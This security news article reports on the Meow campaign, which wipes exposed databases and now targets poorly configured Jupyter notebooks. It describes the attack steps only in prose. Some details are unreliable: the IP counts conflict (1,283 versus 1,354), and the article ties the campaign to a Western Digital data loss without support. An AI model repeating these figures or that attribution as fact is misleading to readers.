HQ/EMEAFind out how we can help your business
The new Meow attack is currently targeting poorly secured Jupyter notebooks. Researchers explained that this new automated meow campaign is trying to compromise numerous publicly accessible databases on the internet.
Moreover, an investigation showed that the new campaign destroys these databases without a clear motive. The early signs of its activities are the attack on Elasticsearch and MongoDB instances without explaining why its operators do such activities. The attack then expanded to other database types and to exposed file systems on the web.
The Meow attack has reached Jupyter.
Based on reports, the operators of the Meow attack accessed a poorly configured Jupyter Notebook instance to execute their code. The attackers targeted about 1,283 distinct IP addresses while their infrastructure was still under investigation.
Moreover, the threat actors initiated a dash shell to harvest information about its victims. The confirmed data they have collected include IDs, architecture, processor types, OS names and their release.
Subsequently, the Meow actors downloaded a malicious script from a shared file server and ran it on the notebook after installing specific Python packages. Researchers also noted that the attackers used Python scripts to target databases, maintaining its uncommon operation.
Furthermore, the investigators found a script named ‘foo’ in the 1354 IP addresses targeting the MongoDB and Elasticsearch databases. On the other hand, separate research spotted a script named ‘bar’ targeting the Hadoop clusters.
Cybersecurity experts explained that these attacks could be catastrophic for everyone since they are automated attacks that could leverage known bugs to target unsecured databases.
The primary example of this event is last year’s compromise on Western Digital, where the Meow attackers deleted petabytes of data. The campaign has obliterated the data from more than 4,000 databases, such as CouchDB, Redis, Jenkins, Cassandra, Hadoop, and Apache ZooKeper.
The Meow attacks have reemerged after a year-long hiatus. Its operators are currently eyeing new targets. Therefore, organisations should regularly review their databases to know if they hold security gaps.
Security teams for every organisation should adopt MFA in every device that stores confidential information to avoid falling prey to such actors.
